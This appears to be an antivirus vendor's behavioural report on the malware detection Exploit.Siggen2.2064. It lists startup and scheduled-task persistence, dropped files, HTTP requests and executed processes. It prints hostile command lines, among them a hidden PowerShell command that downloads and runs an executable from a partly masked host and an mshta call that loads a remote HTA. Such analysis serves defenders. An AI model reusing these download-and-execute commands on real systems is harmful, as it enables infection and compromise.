Exploit.Siggen2.2064

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

%APPDATA%\microsoft\windows\start menu\programs\startup\system.lnk
<SYSTEM32>\tasks\e34907c4fd2c9f641cf0e32874acac87
<SYSTEM32>\tasks\u0xoujf4
<SYSTEM32>\tasks\c3vgpnyg
<SYSTEM32>\tasks\csgsegxg
<SYSTEM32>\tasks\esgyzupa
<SYSTEM32>\tasks\1reitewb
<SYSTEM32>\tasks\btflfr3v
<SYSTEM32>\tasks\11qazkse
<SYSTEM32>\tasks\qgg4fhr2
<SYSTEM32>\tasks\p0x5krdl
<SYSTEM32>\tasks\15i0hq2e

Malicious functions

Downloads and executes

http://cn####8.tmweb.ru/windows.exe as %temp%\exploit.exe

Executes the following (exploit)

'%WINDIR%\syswow64\cmd.exe' /c mshta http://cn####8.tmweb.ru/Exploit.hta

Modifies file system

Creates the following files

%TEMP%\exploit.exe
%TEMP%\umkwfmry.out
%TEMP%\w2cog3qd.0.cs
%TEMP%\w2cog3qd.cmdline
%TEMP%\w2cog3qd.out
C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\csc6b0b.tmp
%TEMP%\res6b99.tmp
C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\svchost.exe
%TEMP%\iuljprpi.0.cs
%TEMP%\iuljprpi.cmdline
%TEMP%\iuljprpi.out
C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\csc7116.tmp
%TEMP%\res7117.tmp
C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\spoolsv.exe
%TEMP%\umkwfmry.0.cs
%TEMP%\umkwfmry.cmdline
%TEMP%\brpl4vhe.0.cs
%TEMP%\brpl4vhe.cmdline
%TEMP%\dtmq4fl4.0.cs
%TEMP%\4hamdutz.out
%TEMP%\4hamdutz.cmdline
%TEMP%\4hamdutz.0.cs
C:\msocache\all users\{90140000-0117-0409-1000-0000000ff1ce}-c\access.en-us\osppsvc.exe
%TEMP%\xp31wfe3.cmdline
%TEMP%\res7a8d.tmp
%TEMP%\4l4nurps.out
%TEMP%\4l4nurps.cmdline
%TEMP%\4l4nurps.0.cs
C:\perflogs\admin\csrss.exe
%TEMP%\res75da.tmp
C:\perflogs\admin\csc75d9.tmp
%TEMP%\brpl4vhe.out
C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\svchost.exe
%TEMP%\res60bc.tmp
C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\csc60bb.tmp
%APPDATA%\windows\mlpi9mkdzgqevbpwj4jccu3ozakcm7.vbs
%APPDATA%\windows\ykf3fucrtmjajnj2vpfjjhslntgkon.bat
%APPDATA%\windows\dclib\al6cf54c5afe698333513f91b6a461a8fe412e5694.dclib
%APPDATA%\windows\dclib\antivm.dclib
%APPDATA%\windows\dclib\fw1400ed0ee6a34b0b561cf386c29735441144b544.dclib
%APPDATA%\windows\c83sauttyw95kev4p9ukfca1xct1oy.bat
%APPDATA%\windows\vmcheck32.dll
%APPDATA%\windows\win.exe
%APPDATA%\windows\system.vbe
%APPDATA%\windows\system.lnk
%TEMP%\dclib\al6cf54c5afe698333513f91b6a461a8fe412e5694.dclib
%TEMP%\dclib\antivm.dclib
%TEMP%\dclib\fw1400ed0ee6a34b0b561cf386c29735441144b544.dclib
C:\documents and settings\ywkfw5v4\win.exe
%APPDATA%\windows\gqoz8cucjnpdaryt6wll.exe
C:\documents and settings\ywkfw5v4\vmcheck32.dll
%TEMP%\eekkrtdr.out
%TEMP%\vn3jlheq.0.cs
%TEMP%\vn3jlheq.cmdline
%TEMP%\vn3jlheq.out
%ProgramFiles(x86)%\windows mail\en-us\csc49c8.tmp
%TEMP%\res49c9.tmp
%ProgramFiles(x86)%\windows mail\en-us\spoolsv.exe
C:\msocache\all users\{90140000-0117-0409-1000-0000000ff1ce}-c\access.en-us\csc7a8c.tmp
%TEMP%\xp31wfe3.0.cs
%TEMP%\dtmq4fl4.cmdline
C:\users\ywkfw5v4\csc5baa.tmp
%TEMP%\res5bab.tmp
C:\users\ywkfw5v4\csrss.exe
%TEMP%\eekkrtdr.0.cs
%TEMP%\eekkrtdr.cmdline
%TEMP%\xp31wfe3.out
%TEMP%\dtmq4fl4.out

Deletes the following files

%TEMP%\res49c9.tmp
%TEMP%\iuljprpi.out
%TEMP%\iuljprpi.0.cs
%TEMP%\iuljprpi.cmdline
%TEMP%\res75da.tmp
C:\perflogs\admin\csc75d9.tmp
%TEMP%\brpl4vhe.cmdline
%TEMP%\brpl4vhe.out
%TEMP%\res7117.tmp
C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\csc7116.tmp
%TEMP%\brpl4vhe.0.cs
%TEMP%\4l4nurps.out
%TEMP%\4l4nurps.cmdline
%TEMP%\4l4nurps.0.cs
%TEMP%\4hamdutz.0.cs
%TEMP%\4hamdutz.out
%TEMP%\4hamdutz.cmdline
%TEMP%\dtmq4fl4.0.cs
%TEMP%\res7a8d.tmp
C:\msocache\all users\{90140000-0117-0409-1000-0000000ff1ce}-c\access.en-us\csc7a8c.tmp
%TEMP%\w2cog3qd.cmdline
%TEMP%\w2cog3qd.0.cs
%TEMP%\w2cog3qd.out
%TEMP%\vn3jlheq.0.cs
%TEMP%\vn3jlheq.out
%TEMP%\vn3jlheq.cmdline
%TEMP%\res5bab.tmp
C:\users\ywkfw5v4\csc5baa.tmp
%TEMP%\xp31wfe3.0.cs
%TEMP%\xp31wfe3.cmdline
%TEMP%\xp31wfe3.out
%ProgramFiles(x86)%\windows mail\en-us\csc49c8.tmp
%TEMP%\res60bc.tmp
%TEMP%\eekkrtdr.0.cs
%TEMP%\eekkrtdr.cmdline
%TEMP%\eekkrtdr.out
%TEMP%\umkwfmry.cmdline
%TEMP%\umkwfmry.0.cs
%TEMP%\umkwfmry.out
%TEMP%\res6b99.tmp
C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\csc6b0b.tmp
C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\csc60bb.tmp
%TEMP%\dtmq4fl4.out
%TEMP%\dtmq4fl4.cmdline

Network activity

TCP

HTTP GET requests

http://cn####8.tmweb.ru/Exploit.hta
http://cn####8.tmweb.ru/windows.exe
http://cn####8.tmweb.ru/vz7wkt1vnmaj4j9yy4a51gcnbp4iu4hdbk6ui0350zxtml3/sflqvsoeiijvo0mo9eu7wz8j6z006fmyrajlcsbci63s8h3pfrkc0q2w6okvq8kqg4n270279/5fe116131d16a8b064272791e782c5d5363db826.php?03...
http://cn####8.tmweb.ru/vz7wkt1vnmaj4j9yy4a51gcnbp4iu4hdbk6ui0350zxtml3/sflqvsoeiijvo0mo9eu7wz8j6z006fmyrajlcsbci63s8h3pfrkc0q2w6okvq8kqg4n270279/5fe116131d16a8b064272791e782c5d5363db826.php?54...
http://cn####8.tmweb.ru/vz7wkt1vnmaj4j9yy4a51gcnbp4iu4hdbk6ui0350zxtml3/sflqvsoeiijvo0mo9eu7wz8j6z006fmyrajlcsbci63s8h3pfrkc0q2w6okvq8kqg4n270279/zgo6qt/6e43f762cba4b86bc0c491b86ddeed9e.php?1e#...
http://ip##fo.io/ip

UDP

DNS ASK cn####8.tmweb.ru
DNS ASK ip##fo.io

Miscellaneous

Searches for the following windows

ClassName: 'EDIT' WindowName: ''

Creates and executes the following

'C:\perflogs\admin\csrss.exe'
'%APPDATA%\windows\win.exe'
'C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\spoolsv.exe'
'C:\users\ywkfw5v4\csrss.exe'
'%ProgramFiles(x86)%\windows mail\en-us\spoolsv.exe'
'%WINDIR%\syswow64\wscript.exe' "%APPDATA%\windows\MLPi9MKdzgQeVBPWJ4jCCU3oZaKCM7.vbs"
'C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\svchost.exe'
'%WINDIR%\syswow64\wscript.exe' "%APPDATA%\windows\System.vbe"
'%APPDATA%\windows\gqoz8cucjnpdaryt6wll.exe' -pfe269a32d6ea191305070eac6a20af987ddbebea
'C:\msocache\all users\{90140000-0117-0409-1000-0000000ff1ce}-c\access.en-us\osppsvc.exe'
'%TEMP%\exploit.exe'
'C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\svchost.exe'
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES60BC.tmp" "c:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\CSC60BB.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\4l4nurps.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\iuljprpi.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES75DA.tmp" "c:\PerfLogs\Admin\CSC75D9.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6B99.tmp" "c:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\CSC6B0B.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7117.tmp" "c:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\CSC7116.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7A8D.tmp" "c:\MSOCache\All Users\{90140000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\CSC7A8C.tmp"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c mshta http://cn####8.tmweb.ru/Exploit.hta' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\brpl4vhe.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\vn3jlheq.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\eekkrtdr.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5BAB.tmp" "c:\Users\ywkfw5v4\CSC5BAA.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xp31wfe3.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES49C9.tmp" "%ProgramFiles(x86)%\Windows Mail\en-US\CSC49C8.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\w2cog3qd.cmdline"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\windows\C83sAUTTyw95KEv4p9UKFcA1xcT1oY.bat" "' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\windows\yKf3FUCrtmjaJNJ2VpFJjHsLntgKoN.bat" "' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\4hamdutz.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\umkwfmry.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dtmq4fl4.cmdline"' (with hidden window)

Executes the following

'%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7A8D.tmp" "c:\MSOCache\All Users\{90140000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\CSC7A8C.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\4l4nurps.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES75DA.tmp" "c:\PerfLogs\Admin\CSC75D9.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\brpl4vhe.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7117.tmp" "c:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\CSC7116.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\iuljprpi.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6B99.tmp" "c:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\CSC6B0B.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\w2cog3qd.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\umkwfmry.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES60BC.tmp" "c:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\CSC60BB.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\eekkrtdr.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5BAB.tmp" "c:\Users\ywkfw5v4\CSC5BAA.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xp31wfe3.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES49C9.tmp" "%ProgramFiles(x86)%\Windows Mail\en-US\CSC49C8.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\vn3jlheq.cmdline"
'%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\windows\C83sAUTTyw95KEv4p9UKFcA1xcT1oY.bat" "
'%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\windows\yKf3FUCrtmjaJNJ2VpFJjHsLntgKoN.bat" "
'<SYSTEM32>\cmd.exe' /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://cn####8.tmweb.ru/windows.exe','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe'
'%WINDIR%\syswow64\mshta.exe' http://cn####8.tmweb.ru/Exploit.hta
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\4hamdutz.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dtmq4fl4.cmdline"

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней